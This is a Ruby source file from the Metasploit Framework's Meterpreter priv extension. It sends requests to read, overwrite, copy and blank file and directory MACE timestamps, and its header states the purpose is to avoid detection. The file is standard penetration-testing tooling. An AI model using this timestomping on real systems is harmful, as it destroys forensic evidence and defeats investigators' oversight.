
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/rex/post/meterpreter/extensions/priv/fs.rb
# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
module Extensions
module Priv
###
#
# File system interface of the priv extension. It reads and rewrites the
# Modified, Accessed, Created and Entry Modified (MACE) timestamps of
# files in order to avoid detection. Every method only builds a request
# packet and hands it to the client; the timestamp work itself is done by
# whatever answers that request.
#
###
class Fs

  #
  # Stores the client that later requests are sent through.
  #
  def initialize(client)
    self.client = client
  end

  #
  # Requests the MACE values of +file_path+ and returns them as a hash
  # keyed 'Modified', 'Accessed', 'Created' and 'Entry Modified'.
  #
  # Each value in the response is passed to ::Time.at, so the resulting
  # Time objects are in the time zone of the process running this code.
  # A RangeError during conversion is re-raised as
  # RangeError 'Invalid MACE values'; other errors propagate unchanged.
  #
  def get_file_mace(file_path)
    req = Packet.create_request(COMMAND_ID_PRIV_FS_GET_FILE_MACE)
    req.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)

    reply = client.send_request(req)

    # Hash key => TLV type that carries the value, in the order the keys
    # appear in the returned hash.
    tlv_for = {
      'Modified'       => TLV_TYPE_FS_FILE_MODIFIED,
      'Accessed'       => TLV_TYPE_FS_FILE_ACCESSED,
      'Created'        => TLV_TYPE_FS_FILE_CREATED,
      'Entry Modified' => TLV_TYPE_FS_FILE_EMODIFIED
    }

    begin
      tlv_for.transform_values { |tlv| ::Time.at(reply.get_tlv_value(tlv)) }
    rescue RangeError
      # Values that ::Time.at cannot represent surface under one message.
      raise RangeError, 'Invalid MACE values'
    end
  end

  #
  # Requests new MACE values for +file_path+. A nil (or false) argument is
  # left out of the request, so that attribute is not part of the change.
  # The others are expected to be Time instances and are sent as +to_i+,
  # i.e. whole seconds with any fractional part dropped.
  #
  # NOTE(review): timestamps with no sub-second component, on a file system
  # that records finer resolution, are a commonly cited indicator when
  # hunting for rewritten timestamps; confirm how the receiving side
  # stores them.
  #
  # Always returns true; the response is not inspected here.
  #
  def set_file_mace(file_path, modified = nil, accessed = nil, created = nil,
                    entry_modified = nil)
    req = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE)
    req.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)

    # Same order as the parameters: M, A, C, E.
    [
      [TLV_TYPE_FS_FILE_MODIFIED,  modified],
      [TLV_TYPE_FS_FILE_ACCESSED,  accessed],
      [TLV_TYPE_FS_FILE_CREATED,   created],
      [TLV_TYPE_FS_FILE_EMODIFIED, entry_modified]
    ].each do |tlv, stamp|
      req.add_tlv(tlv, stamp.to_i) if stamp
    end

    client.send_request(req)
    true
  end

  #
  # Requests that the MACE attributes of +target_file_path+ be set to
  # those of +source_file_path+. Always returns true; the response is not
  # inspected here.
  #
  def set_file_mace_from_file(target_file_path, source_file_path)
    req = Packet.create_request(COMMAND_ID_PRIV_FS_SET_FILE_MACE_FROM_FILE)
    req.add_tlv(TLV_TYPE_FS_FILE_PATH, target_file_path)
    req.add_tlv(TLV_TYPE_FS_SRC_FILE_PATH, source_file_path)

    client.send_request(req)
    true
  end

  #
  # Requests that the MACE values of +file_path+ be set to the minimum
  # threshold, which keeps most products from displaying them for the
  # file. Always returns true; the response is not inspected here.
  #
  def blank_file_mace(file_path)
    req = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_FILE_MACE)
    req.add_tlv(TLV_TYPE_FS_FILE_PATH, file_path)

    client.send_request(req)
    true
  end

  #
  # Directory counterpart of blank_file_mace: requests that the MACE values
  # under +dir_path+ be set, recursively, to the minimum threshold. The
  # path is sent in the same TLV type as a file path. Always returns true;
  # the response is not inspected here.
  #
  def blank_directory_mace(dir_path)
    req = Packet.create_request(COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE)
    req.add_tlv(TLV_TYPE_FS_FILE_PATH, dir_path)

    client.send_request(req)
    true
  end

protected

  attr_accessor :client # :nodoc:

end
end; end; end; end; end